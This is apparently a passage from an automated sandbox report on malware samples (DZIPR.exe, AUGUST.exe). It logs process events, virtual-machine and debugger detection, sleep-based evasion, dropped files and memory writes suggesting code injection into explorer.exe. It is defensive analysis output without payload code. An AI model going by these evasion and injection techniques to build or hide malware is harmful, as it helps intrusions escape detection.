                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Users\user\DZIPR.exeAPI/Special instruction interceptor: Address: 6C5D7C44
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeAPI/Special instruction interceptor: Address: 6C5D7C44
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeAPI/Special instruction interceptor: Address: 6C5D7945
                      Source: C:\Windows\SysWOW64\cmd.exeAPI/Special instruction interceptor: Address: 6C5D3B54
                      Source: C:\Windows\SysWOW64\explorer.exeAPI/Special instruction interceptor: Address: 4EA317
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4862Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4995Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4272Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3487Jump to behavior
                      Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 575Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5740Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3989Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\yigmovmJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mdvbfllrJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vqqcreJump to dropped file
                      Source: C:\Users\user\DZIPR.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_15-18712
                      Source: C:\Users\user\DZIPR.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_15-18810
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_16-18845
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_16-18747
                      Source: C:\Users\user\DZIPR.exeAPI coverage: 4.5 %
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeAPI coverage: 4.7 %
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeAPI coverage: 4.5 %
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6240Thread sleep count: 4862 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6240Thread sleep count: 4995 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1908Thread sleep time: -13835058055282155s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6432Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6920Thread sleep count: 4272 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6832Thread sleep count: 3487 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1060Thread sleep time: -15679732462653109s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2644Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5856Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4788Thread sleep count: 5740 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6204Thread sleep time: -21213755684765971s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4184Thread sleep count: 3989 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6104Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 6528Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: 14_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,14_2_0040301A
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: 14_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,14_2_00402B79
                      Source: C:\Users\user\DZIPR.exeCode function: 15_2_6FA6748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,15_2_6FA6748E
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 16_2_6C53748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,16_2_6C53748E
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 20_2_6FD0748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,20_2_6FD0748E
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                      Source: explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
                      Source: explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
                      Source: DZIPR.exe, 0000000F.00000002.2744697622.0000000003422000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6vmware
                      Source: explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
                      Source: AUGUST.exe, 0000000E.00000002.2748208338.000000000061F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
                      Source: svchost.exe, 00000013.00000002.3430164963.000001E28B051000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
                      Source: svchost.exe, 00000013.00000002.3429019232.000001E28582B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWPA
                      Source: explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
                      Source: AUGUST.exe, 0000000E.00000002.2748208338.000000000061F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}S#;
                      Source: C:\Users\user\DZIPR.exeAPI call chain: ExitProcess graph end nodegraph_15-18811
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeAPI call chain: ExitProcess graph end nodegraph_16-18847
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\DZIPR.exeCode function: 15_2_6FA73F34 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_6FA73F34
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: 14_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow,14_2_00406D5D
                      Source: C:\Users\user\DZIPR.exeCode function: 15_2_6FA65D78 mov eax, dword ptr fs:[00000030h]15_2_6FA65D78
                      Source: C:\Users\user\DZIPR.exeCode function: 15_2_6FA65CA0 mov eax, dword ptr fs:[00000030h]15_2_6FA65CA0
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 16_2_6C535CA0 mov eax, dword ptr fs:[00000030h]16_2_6C535CA0
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 16_2_6C535D78 mov eax, dword ptr fs:[00000030h]16_2_6C535D78
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 20_2_6FD05D78 mov eax, dword ptr fs:[00000030h]20_2_6FD05D78
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 20_2_6FD05CA0 mov eax, dword ptr fs:[00000030h]20_2_6FD05CA0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\DZIPR.exeCode function: 15_2_6FA73F34 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_6FA73F34
                      Source: C:\Users\user\DZIPR.exeCode function: 15_2_6FA7CE5C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_6FA7CE5C
                      Source: C:\Users\user\DZIPR.exeCode function: 15_2_6FA78034 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_6FA78034
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 16_2_6C54CE5C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_6C54CE5C
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 16_2_6C543F34 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_6C543F34
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 16_2_6C548034 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_6C548034
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 20_2_6FD13F34 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_6FD13F34
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 20_2_6FD1CE5C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_6FD1CE5C
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 20_2_6FD18034 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_6FD18034

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeNtProtectVirtualMemory: Direct from: 0x6FD72E09Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeNtQuerySystemInformation: Direct from: 0x6C5366A2Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeNtProtectVirtualMemory: Direct from: 0x6FD72DBFJump to behavior
                      Source: C:\Users\user\DZIPR.exeNtQuerySystemInformation: Direct from: 0x6FA666A2Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeNtProtectVirtualMemory: Direct from: 0x6C5A2AC2Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeNtQuerySystemInformation: Direct from: 0x6FD066A2Jump to behavior
                      Source: C:\Users\user\DZIPR.exeNtProtectVirtualMemory: Direct from: 0x77377B2EJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 4016 base: 4E79C0 value: 55Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 4016 base: 2C00000 value: 00Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 4256 base: 4E79C0 value: 55Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 4256 base: 2950000 value: 00Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 5972 base: 4E79C0 value: 55Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 5972 base: 2EB0000 value: 00Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
